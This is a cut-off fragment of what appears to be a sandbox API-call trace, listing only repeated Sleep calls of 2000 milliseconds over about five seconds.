[0278.763] Sleep (dwMilliseconds=0x7d0) [0278.771] Sleep (dwMilliseconds=0x7d0) [0278.780] Sleep (dwMilliseconds=0x7d0) [0278.789] Sleep (dwMilliseconds=0x7d0) [0278.796] Sleep (dwMilliseconds=0x7d0) [0278.799] Sleep (dwMilliseconds=0x7d0) [0278.800] Sleep (dwMilliseconds=0x7d0) [0278.808] Sleep (dwMilliseconds=0x7d0) [0278.810] Sleep (dwMilliseconds=0x7d0) [0278.818] Sleep (dwMilliseconds=0x7d0) [0278.820] Sleep (dwMilliseconds=0x7d0) [0278.829] Sleep (dwMilliseconds=0x7d0) [0278.830] Sleep (dwMilliseconds=0x7d0) [0278.839] Sleep (dwMilliseconds=0x7d0) [0278.840] Sleep (dwMilliseconds=0x7d0) [0278.842] Sleep (dwMilliseconds=0x7d0) [0278.846] Sleep (dwMilliseconds=0x7d0) [0278.848] Sleep (dwMilliseconds=0x7d0) [0278.853] Sleep (dwMilliseconds=0x7d0) [0278.854] Sleep (dwMilliseconds=0x7d0) [0278.860] Sleep (dwMilliseconds=0x7d0) [0278.861] Sleep (dwMilliseconds=0x7d0) [0278.867] Sleep (dwMilliseconds=0x7d0) [0278.869] Sleep (dwMilliseconds=0x7d0) [0278.874] Sleep (dwMilliseconds=0x7d0) [0278.876] Sleep (dwMilliseconds=0x7d0) [0278.882] Sleep (dwMilliseconds=0x7d0) [0278.887] Sleep (dwMilliseconds=0x7d0) [0278.889] Sleep (dwMilliseconds=0x7d0) [0278.890] Sleep (dwMilliseconds=0x7d0) [0278.896] Sleep (dwMilliseconds=0x7d0) [0278.897] Sleep (dwMilliseconds=0x7d0) [0278.903] Sleep (dwMilliseconds=0x7d0) [0278.910] Sleep (dwMilliseconds=0x7d0) [0278.912] Sleep (dwMilliseconds=0x7d0) [0278.918] Sleep (dwMilliseconds=0x7d0) [0278.925] Sleep (dwMilliseconds=0x7d0) [0278.931] Sleep (dwMilliseconds=0x7d0) [0278.932] Sleep (dwMilliseconds=0x7d0) [0278.938] Sleep (dwMilliseconds=0x7d0) [0278.939] Sleep (dwMilliseconds=0x7d0) [0278.945] Sleep (dwMilliseconds=0x7d0) [0278.951] Sleep (dwMilliseconds=0x7d0) [0278.952] Sleep (dwMilliseconds=0x7d0) [0278.958] Sleep (dwMilliseconds=0x7d0) [0278.965] Sleep (dwMilliseconds=0x7d0) [0278.968] Sleep (dwMilliseconds=0x7d0) [0278.973] Sleep (dwMilliseconds=0x7d0) [0278.974] Sleep (dwMilliseconds=0x7d0) [0278.978] Sleep (dwMilliseconds=0x7d0) [0278.980] Sleep (dwMilliseconds=0x7d0) [0279.018] Sleep (dwMilliseconds=0x7d0) [0279.030] Sleep (dwMilliseconds=0x7d0) [0279.038] Sleep (dwMilliseconds=0x7d0) [0279.040] Sleep (dwMilliseconds=0x7d0) [0279.048] Sleep (dwMilliseconds=0x7d0) [0279.049] Sleep (dwMilliseconds=0x7d0) [0279.057] Sleep (dwMilliseconds=0x7d0) [0279.060] Sleep (dwMilliseconds=0x7d0) [0279.068] Sleep (dwMilliseconds=0x7d0) [0279.077] Sleep (dwMilliseconds=0x7d0) [0279.078] Sleep (dwMilliseconds=0x7d0) [0279.087] Sleep (dwMilliseconds=0x7d0) [0279.097] Sleep (dwMilliseconds=0x7d0) [0279.103] Sleep (dwMilliseconds=0x7d0) [0279.107] Sleep (dwMilliseconds=0x7d0) [0279.108] Sleep (dwMilliseconds=0x7d0) [0279.118] Sleep (dwMilliseconds=0x7d0) [0279.119] Sleep (dwMilliseconds=0x7d0) [0279.129] Sleep (dwMilliseconds=0x7d0) [0279.138] Sleep (dwMilliseconds=0x7d0) [0279.140] Sleep (dwMilliseconds=0x7d0) [0279.147] Sleep (dwMilliseconds=0x7d0) [0279.149] Sleep (dwMilliseconds=0x7d0) [0279.150] Sleep (dwMilliseconds=0x7d0) [0279.159] Sleep (dwMilliseconds=0x7d0) [0279.168] Sleep (dwMilliseconds=0x7d0) [0279.170] Sleep (dwMilliseconds=0x7d0) [0279.179] Sleep (dwMilliseconds=0x7d0) [0279.180] Sleep (dwMilliseconds=0x7d0) [0279.188] Sleep (dwMilliseconds=0x7d0) [0279.190] Sleep (dwMilliseconds=0x7d0) [0279.193] Sleep (dwMilliseconds=0x7d0) [0279.200] Sleep (dwMilliseconds=0x7d0) [0279.201] Sleep (dwMilliseconds=0x7d0) [0279.210] Sleep (dwMilliseconds=0x7d0) [0279.212] Sleep (dwMilliseconds=0x7d0) [0279.221] Sleep (dwMilliseconds=0x7d0) [0279.230] Sleep (dwMilliseconds=0x7d0) [0279.231] Sleep (dwMilliseconds=0x7d0) [0279.237] Sleep (dwMilliseconds=0x7d0) [0279.239] Sleep (dwMilliseconds=0x7d0) [0279.241] Sleep (dwMilliseconds=0x7d0) [0280.385] Sleep (dwMilliseconds=0x7d0) [0280.395] Sleep (dwMilliseconds=0x7d0) [0280.404] Sleep (dwMilliseconds=0x7d0) [0280.405] Sleep (dwMilliseconds=0x7d0) [0280.413] Sleep (dwMilliseconds=0x7d0) [0280.414] Sleep (dwMilliseconds=0x7d0) [0280.425] Sleep (dwMilliseconds=0x7d0) [0280.426] Sleep (dwMilliseconds=0x7d0) [0280.431] Sleep (dwMilliseconds=0x7d0) [0280.435] Sleep (dwMilliseconds=0x7d0) [0280.438] Sleep (dwMilliseconds=0x7d0) [0280.449] Sleep (dwMilliseconds=0x7d0) [0280.457] Sleep (dwMilliseconds=0x7d0) [0280.458] Sleep (dwMilliseconds=0x7d0) [0280.466] Sleep (dwMilliseconds=0x7d0) [0280.467] Sleep (dwMilliseconds=0x7d0) [0280.475] Sleep (dwMilliseconds=0x7d0) [0280.480] Sleep (dwMilliseconds=0x7d0) [0280.484] Sleep (dwMilliseconds=0x7d0) [0280.485] Sleep (dwMilliseconds=0x7d0) [0280.493] Sleep (dwMilliseconds=0x7d0) [0280.494] Sleep (dwMilliseconds=0x7d0) [0280.502] Sleep (dwMilliseconds=0x7d0) [0280.511] Sleep (dwMilliseconds=0x7d0) [0280.580] Sleep (dwMilliseconds=0x7d0) [0280.582] Sleep (dwMilliseconds=0x7d0) [0280.584] Sleep (dwMilliseconds=0x7d0) [0280.588] Sleep (dwMilliseconds=0x7d0) [0280.595] Sleep (dwMilliseconds=0x7d0) [0280.603] Sleep (dwMilliseconds=0x7d0) [0280.604] Sleep (dwMilliseconds=0x7d0) [0280.612] Sleep (dwMilliseconds=0x7d0) [0280.613] Sleep (dwMilliseconds=0x7d0) [0280.621] Sleep (dwMilliseconds=0x7d0) [0280.622] Sleep (dwMilliseconds=0x7d0) [0280.627] Sleep (dwMilliseconds=0x7d0) [0280.629] Sleep (dwMilliseconds=0x7d0) [0280.635] Sleep (dwMilliseconds=0x7d0) [0280.642] Sleep (dwMilliseconds=0x7d0) [0280.649] Sleep (dwMilliseconds=0x7d0) [0280.651] Sleep (dwMilliseconds=0x7d0) [0280.702] Sleep (dwMilliseconds=0x7d0) [0280.712] Sleep (dwMilliseconds=0x7d0) [0280.714] Sleep (dwMilliseconds=0x7d0) [0280.722] Sleep (dwMilliseconds=0x7d0) [0280.724] Sleep (dwMilliseconds=0x7d0) [0280.732] Sleep (dwMilliseconds=0x7d0) [0280.733] Sleep (dwMilliseconds=0x7d0) [0280.743] Sleep (dwMilliseconds=0x7d0) [0280.744] Sleep (dwMilliseconds=0x7d0) [0280.753] Sleep (dwMilliseconds=0x7d0) [0280.758] Sleep (dwMilliseconds=0x7d0) [0280.763] Sleep (dwMilliseconds=0x7d0) [0280.772] Sleep (dwMilliseconds=0x7d0) [0280.781] Sleep (dwMilliseconds=0x7d0) [0280.783] Sleep (dwMilliseconds=0x7d0) [0280.792] Sleep (dwMilliseconds=0x7d0) [0280.794] Sleep (dwMilliseconds=0x7d0) [0280.802] Sleep (dwMilliseconds=0x7d0) [0280.804] Sleep (dwMilliseconds=0x7d0) [0280.805] Sleep (dwMilliseconds=0x7d0) [0280.812] Sleep (dwMilliseconds=0x7d0) [0280.821] Sleep (dwMilliseconds=0x7d0) [0280.823] Sleep (dwMilliseconds=0x7d0) [0280.830] Sleep (dwMilliseconds=0x7d0) [0280.832] Sleep (dwMilliseconds=0x7d0) [0280.839] Sleep (dwMilliseconds=0x7d0) [0280.848] Sleep (dwMilliseconds=0x7d0) [0280.849] Sleep (dwMilliseconds=0x7d0) [0280.857] Sleep (dwMilliseconds=0x7d0) [0280.858] Sleep (dwMilliseconds=0x7d0) [0280.866] Sleep (dwMilliseconds=0x7d0) [0280.867] Sleep (dwMilliseconds=0x7d0) [0280.875] Sleep (dwMilliseconds=0x7d0) [0280.877] Sleep (dwMilliseconds=0x7d0) [0280.885] Sleep (dwMilliseconds=0x7d0) [0280.892] Sleep (dwMilliseconds=0x7d0) [0280.896] Sleep (dwMilliseconds=0x7d0) [0280.897] Sleep (dwMilliseconds=0x7d0) [0280.905] Sleep (dwMilliseconds=0x7d0) [0280.907] Sleep (dwMilliseconds=0x7d0) [0280.916] Sleep (dwMilliseconds=0x7d0) [0280.917] Sleep (dwMilliseconds=0x7d0) [0280.927] Sleep (dwMilliseconds=0x7d0) [0280.935] Sleep (dwMilliseconds=0x7d0) [0280.940] Sleep (dwMilliseconds=0x7d0) [0280.944] Sleep (dwMilliseconds=0x7d0) [0280.952] Sleep (dwMilliseconds=0x7d0) [0280.960] Sleep (dwMilliseconds=0x7d0) [0280.962] Sleep (dwMilliseconds=0x7d0) [0280.970] Sleep (dwMilliseconds=0x7d0) [0280.971] Sleep (dwMilliseconds=0x7d0) [0280.979] Sleep (dwMilliseconds=0x7d0) [0280.984] Sleep (dwMilliseconds=0x7d0) [0280.988] Sleep (dwMilliseconds=0x7d0) [0280.990] Sleep (dwMilliseconds=0x7d0) [0280.998] Sleep (dwMilliseconds=0x7d0) [0281.007] Sleep (dwMilliseconds=0x7d0) [0281.009] Sleep (dwMilliseconds=0x7d0) [0281.016] Sleep (dwMilliseconds=0x7d0) [0281.025] Sleep (dwMilliseconds=0x7d0) [0281.026] Sleep (dwMilliseconds=0x7d0) [0281.028] Sleep (dwMilliseconds=0x7d0) [0281.034] Sleep (dwMilliseconds=0x7d0) [0281.036] Sleep (dwMilliseconds=0x7d0) [0281.043] Sleep (dwMilliseconds=0x7d0) [0281.051] Sleep (dwMilliseconds=0x7d0) [0281.052] Sleep (dwMilliseconds=0x7d0) [0281.061] Sleep (dwMilliseconds=0x7d0) [0281.069] Sleep (dwMilliseconds=0x7d0) [0281.071] Sleep (dwMilliseconds=0x7d0) [0281.078] Sleep (dwMilliseconds=0x7d0) [0281.080] Sleep (dwMilliseconds=0x7d0) [0281.087] Sleep (dwMilliseconds=0x7d0) [0281.098] Sleep (dwMilliseconds=0x7d0) [0281.099] Sleep (dwMilliseconds=0x7d0) [0281.149] Sleep (dwMilliseconds=0x7d0) [0281.159] Sleep (dwMilliseconds=0x7d0) [0281.160] Sleep (dwMilliseconds=0x7d0) [0281.168] Sleep (dwMilliseconds=0x7d0) [0281.175] Sleep (dwMilliseconds=0x7d0) [0281.182] Sleep (dwMilliseconds=0x7d0) [0281.185] Sleep (dwMilliseconds=0x7d0) [0281.193] Sleep (dwMilliseconds=0x7d0) [0281.195] Sleep (dwMilliseconds=0x7d0) [0281.204] Sleep (dwMilliseconds=0x7d0) [0281.205] Sleep (dwMilliseconds=0x7d0) [0281.211] Sleep (dwMilliseconds=0x7d0) [0281.213] Sleep (dwMilliseconds=0x7d0) [0281.215] Sleep (dwMilliseconds=0x7d0) [0281.222] Sleep (dwMilliseconds=0x7d0) [0281.224] Sleep (dwMilliseconds=0x7d0) [0281.231] Sleep (dwMilliseconds=0x7d0) [0281.240] Sleep (dwMilliseconds=0x7d0) [0281.242] Sleep (dwMilliseconds=0x7d0) [0281.250] Sleep (dwMilliseconds=0x7d0) [0281.251] Sleep (dwMilliseconds=0x7d0) [0281.256] Sleep (dwMilliseconds=0x7d0) [0281.261] Sleep (dwMilliseconds=0x7d0) [0281.263] Sleep (dwMilliseconds=0x7d0) [0281.270] Sleep (dwMilliseconds=0x7d0) [0281.272] Sleep (dwMilliseconds=0x7d0) [0281.280] Sleep (dwMilliseconds=0x7d0) [0281.288] Sleep (dwMilliseconds=0x7d0) [0281.298] Sleep (dwMilliseconds=0x7d0) [0281.300] Sleep (dwMilliseconds=0x7d0) [0281.303] Sleep (dwMilliseconds=0x7d0) [0281.307] Sleep (dwMilliseconds=0x7d0) [0281.316] Sleep (dwMilliseconds=0x7d0) [0281.325] Sleep (dwMilliseconds=0x7d0) [0281.345] Sleep (dwMilliseconds=0x7d0) [0281.347] Sleep (dwMilliseconds=0x7d0) [0281.356] Sleep (dwMilliseconds=0x7d0) [0281.358] Sleep (dwMilliseconds=0x7d0) [0281.366] Sleep (dwMilliseconds=0x7d0) [0281.374] Sleep (dwMilliseconds=0x7d0) [0281.376] Sleep (dwMilliseconds=0x7d0) [0281.384] Sleep (dwMilliseconds=0x7d0) [0281.394] Sleep (dwMilliseconds=0x7d0) [0281.395] Sleep (dwMilliseconds=0x7d0) [0281.404] Sleep (dwMilliseconds=0x7d0) [0281.406] Sleep (dwMilliseconds=0x7d0) [0281.407] Sleep (dwMilliseconds=0x7d0) [0281.416] Sleep (dwMilliseconds=0x7d0) [0281.418] Sleep (dwMilliseconds=0x7d0) [0281.426] Sleep (dwMilliseconds=0x7d0) [0281.435] Sleep (dwMilliseconds=0x7d0) [0281.437] Sleep (dwMilliseconds=0x7d0) [0281.447] Sleep (dwMilliseconds=0x7d0) [0281.452] Sleep (dwMilliseconds=0x7d0) [0281.456] Sleep (dwMilliseconds=0x7d0) [0281.464] Sleep (dwMilliseconds=0x7d0) [0281.466] Sleep (dwMilliseconds=0x7d0) [0281.474] Sleep (dwMilliseconds=0x7d0) [0281.476] Sleep (dwMilliseconds=0x7d0) [0281.482] Sleep (dwMilliseconds=0x7d0) [0281.489] Sleep (dwMilliseconds=0x7d0) [0281.491] Sleep (dwMilliseconds=0x7d0) [0281.496] Sleep (dwMilliseconds=0x7d0) [0281.498] Sleep (dwMilliseconds=0x7d0) [0281.499] Sleep (dwMilliseconds=0x7d0) [0281.507] Sleep (dwMilliseconds=0x7d0) [0281.509] Sleep (dwMilliseconds=0x7d0) [0281.515] Sleep (dwMilliseconds=0x7d0) [0281.516] Sleep (dwMilliseconds=0x7d0) [0281.523] Sleep (dwMilliseconds=0x7d0) [0281.526] Sleep (dwMilliseconds=0x7d0) [0281.534] Sleep (dwMilliseconds=0x7d0) [0281.541] Sleep (dwMilliseconds=0x7d0) [0281.583] Sleep (dwMilliseconds=0x7d0) [0281.589] Sleep (dwMilliseconds=0x7d0) [0281.591] Sleep (dwMilliseconds=0x7d0) [0281.597] Sleep (dwMilliseconds=0x7d0) [0281.606] Sleep (dwMilliseconds=0x7d0) [0281.613] Sleep (dwMilliseconds=0x7d0) [0281.614] Sleep (dwMilliseconds=0x7d0) [0281.622] Sleep (dwMilliseconds=0x7d0) [0281.623] Sleep (dwMilliseconds=0x7d0) [0281.631] Sleep (dwMilliseconds=0x7d0) [0281.633] Sleep (dwMilliseconds=0x7d0) [0281.641] Sleep (dwMilliseconds=0x7d0) [0281.642] Sleep (dwMilliseconds=0x7d0) [0281.651] Sleep (dwMilliseconds=0x7d0) [0281.660] Sleep (dwMilliseconds=0x7d0) [0281.661] Sleep (dwMilliseconds=0x7d0) [0281.669] Sleep (dwMilliseconds=0x7d0) [0281.671] Sleep (dwMilliseconds=0x7d0) [0281.676] Sleep (dwMilliseconds=0x7d0) [0281.679] Sleep (dwMilliseconds=0x7d0) [0281.681] Sleep (dwMilliseconds=0x7d0) [0281.690] Sleep (dwMilliseconds=0x7d0) [0281.691] Sleep (dwMilliseconds=0x7d0) [0281.701] Sleep (dwMilliseconds=0x7d0) [0281.710] Sleep (dwMilliseconds=0x7d0) [0281.719] Sleep (dwMilliseconds=0x7d0) [0281.720] Sleep (dwMilliseconds=0x7d0) [0281.724] Sleep (dwMilliseconds=0x7d0) [0281.727] Sleep (dwMilliseconds=0x7d0) [0281.729] Sleep (dwMilliseconds=0x7d0) [0281.736] Sleep (dwMilliseconds=0x7d0) [0281.738] Sleep (dwMilliseconds=0x7d0) [0281.746] Sleep (dwMilliseconds=0x7d0) [0281.747] Sleep (dwMilliseconds=0x7d0) [0281.755] Sleep (dwMilliseconds=0x7d0) [0281.756] Sleep (dwMilliseconds=0x7d0) [0281.764] Sleep (dwMilliseconds=0x7d0) [0281.766] Sleep (dwMilliseconds=0x7d0) [0281.769] Sleep (dwMilliseconds=0x7d0) [0281.774] Sleep (dwMilliseconds=0x7d0) [0281.776] Sleep (dwMilliseconds=0x7d0) [0281.783] Sleep (dwMilliseconds=0x7d0) [0281.792] Sleep (dwMilliseconds=0x7d0) [0281.794] Sleep (dwMilliseconds=0x7d0) [0281.801] Sleep (dwMilliseconds=0x7d0) [0281.802] Sleep (dwMilliseconds=0x7d0) [0281.812] Sleep (dwMilliseconds=0x7d0) [0281.814] Sleep (dwMilliseconds=0x7d0) [0281.815] Sleep (dwMilliseconds=0x7d0) [0281.821] Sleep (dwMilliseconds=0x7d0) [0281.830] Sleep (dwMilliseconds=0x7d0) [0281.838] Sleep (dwMilliseconds=0x7d0) [0281.839] Sleep (dwMilliseconds=0x7d0) [0281.846] Sleep (dwMilliseconds=0x7d0) [0281.847] Sleep (dwMilliseconds=0x7d0) [0281.855] Sleep (dwMilliseconds=0x7d0) [0281.857] Sleep (dwMilliseconds=0x7d0) [0281.863] Sleep (dwMilliseconds=0x7d0) [0281.871] Sleep (dwMilliseconds=0x7d0) [0281.878] Sleep (dwMilliseconds=0x7d0) [0281.880] Sleep (dwMilliseconds=0x7d0) [0281.887] Sleep (dwMilliseconds=0x7d0) [0281.889] Sleep (dwMilliseconds=0x7d0) [0281.896] Sleep (dwMilliseconds=0x7d0) [0281.901] Sleep (dwMilliseconds=0x7d0) [0281.905] Sleep (dwMilliseconds=0x7d0) [0281.907] Sleep (dwMilliseconds=0x7d0) [0281.915] Sleep (dwMilliseconds=0x7d0) [0281.917] Sleep (dwMilliseconds=0x7d0) [0281.924] Sleep (dwMilliseconds=0x7d0) [0281.926] Sleep (dwMilliseconds=0x7d0) [0281.934] Sleep (dwMilliseconds=0x7d0) [0281.943] Sleep (dwMilliseconds=0x7d0) [0281.944] Sleep (dwMilliseconds=0x7d0) [0281.946] Sleep (dwMilliseconds=0x7d0) [0281.952] Sleep (dwMilliseconds=0x7d0) [0281.954] Sleep (dwMilliseconds=0x7d0) [0281.962] Sleep (dwMilliseconds=0x7d0) [0281.963] Sleep (dwMilliseconds=0x7d0) [0281.973] Sleep (dwMilliseconds=0x7d0) [0281.975] Sleep (dwMilliseconds=0x7d0) [0281.984] Sleep (dwMilliseconds=0x7d0) [0281.992] Sleep (dwMilliseconds=0x7d0) [0281.994] Sleep (dwMilliseconds=0x7d0) [0282.002] Sleep (dwMilliseconds=0x7d0) [0282.012] Sleep (dwMilliseconds=0x7d0) [0282.021] Sleep (dwMilliseconds=0x7d0) [0282.022] Sleep (dwMilliseconds=0x7d0) [0282.030] Sleep (dwMilliseconds=0x7d0) [0282.031] Sleep (dwMilliseconds=0x7d0) [0282.036] Sleep (dwMilliseconds=0x7d0) [0282.041] Sleep (dwMilliseconds=0x7d0) [0282.042] Sleep (dwMilliseconds=0x7d0) [0282.051] Sleep (dwMilliseconds=0x7d0) [0282.059] Sleep (dwMilliseconds=0x7d0) [0282.068] Sleep (dwMilliseconds=0x7d0) [0282.077] Sleep (dwMilliseconds=0x7d0) [0282.079] Sleep (dwMilliseconds=0x7d0) [0282.087] Sleep (dwMilliseconds=0x7d0) [0282.089] Sleep (dwMilliseconds=0x7d0) [0282.097] Sleep (dwMilliseconds=0x7d0) [0282.099] Sleep (dwMilliseconds=0x7d0) [0282.148] Sleep (dwMilliseconds=0x7d0) [0282.150] Sleep (dwMilliseconds=0x7d0) [0282.159] Sleep (dwMilliseconds=0x7d0) [0282.160] Sleep (dwMilliseconds=0x7d0) [0282.164] Sleep (dwMilliseconds=0x7d0) [0282.168] Sleep (dwMilliseconds=0x7d0) [0282.177] Sleep (dwMilliseconds=0x7d0) [0282.185] Sleep (dwMilliseconds=0x7d0) [0282.194] Sleep (dwMilliseconds=0x7d0) [0282.195] Sleep (dwMilliseconds=0x7d0) [0282.204] Sleep (dwMilliseconds=0x7d0) [0282.208] Sleep (dwMilliseconds=0x7d0) [0282.214] Sleep (dwMilliseconds=0x7d0) [0282.216] Sleep (dwMilliseconds=0x7d0) [0282.224] Sleep (dwMilliseconds=0x7d0) [0282.225] Sleep (dwMilliseconds=0x7d0) [0282.233] Sleep (dwMilliseconds=0x7d0) [0282.234] Sleep (dwMilliseconds=0x7d0) [0282.243] Sleep (dwMilliseconds=0x7d0) [0282.244] Sleep (dwMilliseconds=0x7d0) [0282.251] Sleep (dwMilliseconds=0x7d0) [0282.254] Sleep (dwMilliseconds=0x7d0) [0282.255] Sleep (dwMilliseconds=0x7d0) [0282.264] Sleep (dwMilliseconds=0x7d0) [0282.271] Sleep (dwMilliseconds=0x7d0) [0282.272] Sleep (dwMilliseconds=0x7d0) [0282.278] Sleep (dwMilliseconds=0x7d0) [0282.288] Sleep (dwMilliseconds=0x7d0) [0282.289] Sleep (dwMilliseconds=0x7d0) [0282.295] Sleep (dwMilliseconds=0x7d0) [0282.297] Sleep (dwMilliseconds=0x7d0) [0282.306] Sleep (dwMilliseconds=0x7d0) [0282.307] Sleep (dwMilliseconds=0x7d0) [0282.314] Sleep (dwMilliseconds=0x7d0) [0282.316] Sleep (dwMilliseconds=0x7d0) [0282.323] Sleep (dwMilliseconds=0x7d0) [0282.324] Sleep (dwMilliseconds=0x7d0) [0282.342] Sleep (dwMilliseconds=0x7d0) [0282.352] Sleep (dwMilliseconds=0x7d0) [0282.355] Sleep (dwMilliseconds=0x7d0) [0282.363] Sleep (dwMilliseconds=0x7d0) [0282.373] Sleep (dwMilliseconds=0x7d0) [0282.374] Sleep (dwMilliseconds=0x7d0) [0282.380] Sleep (dwMilliseconds=0x7d0) [0282.381] Sleep (dwMilliseconds=0x7d0) [0282.388] Sleep (dwMilliseconds=0x7d0) [0282.390] Sleep (dwMilliseconds=0x7d0) [0282.396] Sleep (dwMilliseconds=0x7d0) [0282.397] Sleep (dwMilliseconds=0x7d0) [0282.400] Sleep (dwMilliseconds=0x7d0) [0282.404] Sleep (dwMilliseconds=0x7d0) [0282.406] Sleep (dwMilliseconds=0x7d0) [0282.412] Sleep (dwMilliseconds=0x7d0) [0282.414] Sleep (dwMilliseconds=0x7d0) [0282.425] Sleep (dwMilliseconds=0x7d0) [0282.433] Sleep (dwMilliseconds=0x7d0) [0282.440] Sleep (dwMilliseconds=0x7d0) [0282.442] Sleep (dwMilliseconds=0x7d0) [0282.445] Sleep (dwMilliseconds=0x7d0) [0282.450] Sleep (dwMilliseconds=0x7d0) [0282.458] Sleep (dwMilliseconds=0x7d0) [0282.465] Sleep (dwMilliseconds=0x7d0) [0282.467] Sleep (dwMilliseconds=0x7d0) [0282.474] Sleep (dwMilliseconds=0x7d0) [0282.476] Sleep (dwMilliseconds=0x7d0) [0282.484] Sleep (dwMilliseconds=0x7d0) [0282.489] Sleep (dwMilliseconds=0x7d0) [0282.492] Sleep (dwMilliseconds=0x7d0) [0282.493] Sleep (dwMilliseconds=0x7d0) [0282.499] Sleep (dwMilliseconds=0x7d0) [0282.508] Sleep (dwMilliseconds=0x7d0) [0282.515] Sleep (dwMilliseconds=0x7d0) [0282.516] Sleep (dwMilliseconds=0x7d0) [0282.523] Sleep (dwMilliseconds=0x7d0) [0282.524] Sleep (dwMilliseconds=0x7d0) [0282.530] Sleep (dwMilliseconds=0x7d0) [0282.532] Sleep (dwMilliseconds=0x7d0) [0282.536] Sleep (dwMilliseconds=0x7d0) [0282.540] Sleep (dwMilliseconds=0x7d0) [0282.541] Sleep (dwMilliseconds=0x7d0) [0282.549] Sleep (dwMilliseconds=0x7d0) [0282.556] Sleep (dwMilliseconds=0x7d0) [0282.558] Sleep (dwMilliseconds=0x7d0) [0282.565] Sleep (dwMilliseconds=0x7d0) [0282.566] Sleep (dwMilliseconds=0x7d0) [0282.572] Sleep (dwMilliseconds=0x7d0) [0282.574] Sleep (dwMilliseconds=0x7d0) [0282.581] Sleep (dwMilliseconds=0x7d0) [0282.582] Sleep (dwMilliseconds=0x7d0) [0282.589] Sleep (dwMilliseconds=0x7d0) [0282.596] Sleep (dwMilliseconds=0x7d0) [0282.598] Sleep (dwMilliseconds=0x7d0) [0282.605] Sleep (dwMilliseconds=0x7d0) [0282.606] Sleep (dwMilliseconds=0x7d0) [0282.612] Sleep (dwMilliseconds=0x7d0) [0282.613] Sleep (dwMilliseconds=0x7d0) [0282.621] Sleep (dwMilliseconds=0x7d0) [0282.625] Sleep (dwMilliseconds=0x7d0) [0282.629] Sleep (dwMilliseconds=0x7d0) [0282.631] Sleep (dwMilliseconds=0x7d0) [0282.639] Sleep (dwMilliseconds=0x7d0) [0282.640] Sleep (dwMilliseconds=0x7d0) [0282.649] Sleep (dwMilliseconds=0x7d0) [0282.656] Sleep (dwMilliseconds=0x7d0) [0282.657] Sleep (dwMilliseconds=0x7d0) [0282.662] Sleep (dwMilliseconds=0x7d0) [0282.664] Sleep (dwMilliseconds=0x7d0) [0282.670] Sleep (dwMilliseconds=0x7d0) [0282.671] Sleep (dwMilliseconds=0x7d0) [0282.678] Sleep (dwMilliseconds=0x7d0) [0282.679] Sleep (dwMilliseconds=0x7d0) [0282.686] Sleep (dwMilliseconds=0x7d0) [0282.693] Sleep (dwMilliseconds=0x7d0) [0282.694] Sleep (dwMilliseconds=0x7d0) [0282.700] Sleep (dwMilliseconds=0x7d0) [0282.702] Sleep (dwMilliseconds=0x7d0) [0282.708] Sleep (dwMilliseconds=0x7d0) [0282.714] Sleep (dwMilliseconds=0x7d0) [0282.715] Sleep (dwMilliseconds=0x7d0) [0282.721] Sleep (dwMilliseconds=0x7d0) [0282.723] Sleep (dwMilliseconds=0x7d0) [0282.729] Sleep (dwMilliseconds=0x7d0) [0282.731] Sleep (dwMilliseconds=0x7d0) [0282.737] Sleep (dwMilliseconds=0x7d0) [0282.738] Sleep (dwMilliseconds=0x7d0) [0282.744] Sleep (dwMilliseconds=0x7d0) [0282.745] Sleep (dwMilliseconds=0x7d0) [0282.752] Sleep (dwMilliseconds=0x7d0) [0282.753] Sleep (dwMilliseconds=0x7d0) [0282.763] Sleep (dwMilliseconds=0x7d0) [0282.771] Sleep (dwMilliseconds=0x7d0) [0282.772] Sleep (dwMilliseconds=0x7d0) [0282.778] Sleep (dwMilliseconds=0x7d0) [0282.786] Sleep (dwMilliseconds=0x7d0) [0282.787] Sleep (dwMilliseconds=0x7d0) [0282.793] Sleep (dwMilliseconds=0x7d0) [0282.800] Sleep (dwMilliseconds=0x7d0) [0282.806] Sleep (dwMilliseconds=0x7d0) [0282.813] Sleep (dwMilliseconds=0x7d0) [0282.814] Sleep (dwMilliseconds=0x7d0) [0282.820] Sleep (dwMilliseconds=0x7d0) [0282.821] Sleep (dwMilliseconds=0x7d0) [0282.827] Sleep (dwMilliseconds=0x7d0) [0282.833] Sleep (dwMilliseconds=0x7d0) [0283.010] Sleep (dwMilliseconds=0x7d0) [0283.012] Sleep (dwMilliseconds=0x7d0) [0283.015] Sleep (dwMilliseconds=0x7d0) [0283.020] Sleep (dwMilliseconds=0x7d0) [0283.022] Sleep (dwMilliseconds=0x7d0) [0283.029] Sleep (dwMilliseconds=0x7d0) [0283.031] Sleep (dwMilliseconds=0x7d0) [0283.041] Sleep (dwMilliseconds=0x7d0) [0283.042] Sleep (dwMilliseconds=0x7d0) [0283.050] Sleep (dwMilliseconds=0x7d0) [0283.059] Sleep (dwMilliseconds=0x7d0) [0283.060] Sleep (dwMilliseconds=0x7d0) [0283.062] Sleep (dwMilliseconds=0x7d0) [0283.068] Sleep (dwMilliseconds=0x7d0) [0283.076] Sleep (dwMilliseconds=0x7d0) [0283.085] Sleep (dwMilliseconds=0x7d0) [0283.086] Sleep (dwMilliseconds=0x7d0) [0283.094] Sleep (dwMilliseconds=0x7d0) [0283.103] Sleep (dwMilliseconds=0x7d0) [0283.105] Sleep (dwMilliseconds=0x7d0) [0283.108] Sleep (dwMilliseconds=0x7d0) [0283.112] Sleep (dwMilliseconds=0x7d0) [0283.122] Sleep (dwMilliseconds=0x7d0) [0283.131] Sleep (dwMilliseconds=0x7d0) [0283.132] Sleep (dwMilliseconds=0x7d0) [0283.138] Sleep (dwMilliseconds=0x7d0) [0283.147] Sleep (dwMilliseconds=0x7d0) [0283.148] Sleep (dwMilliseconds=0x7d0) [0283.152] Sleep (dwMilliseconds=0x7d0) [0283.156] Sleep (dwMilliseconds=0x7d0) [0283.158] Sleep (dwMilliseconds=0x7d0) [0283.166] Sleep (dwMilliseconds=0x7d0) [0283.167] Sleep (dwMilliseconds=0x7d0) [0283.175] Sleep (dwMilliseconds=0x7d0) [0283.176] Sleep (dwMilliseconds=0x7d0) [0283.184] Sleep (dwMilliseconds=0x7d0) [0283.186] Sleep (dwMilliseconds=0x7d0) [0283.193] Sleep (dwMilliseconds=0x7d0) [0283.194] Sleep (dwMilliseconds=0x7d0) [0283.198] Sleep (dwMilliseconds=0x7d0) [0283.203] Sleep (dwMilliseconds=0x7d0) [0283.205] Sleep (dwMilliseconds=0x7d0) [0283.212] Sleep (dwMilliseconds=0x7d0) [0283.214] Sleep (dwMilliseconds=0x7d0) [0283.222] Sleep (dwMilliseconds=0x7d0) [0283.231] Sleep (dwMilliseconds=0x7d0) [0283.233] Sleep (dwMilliseconds=0x7d0) [0283.241] Sleep (dwMilliseconds=0x7d0) [0283.242] Sleep 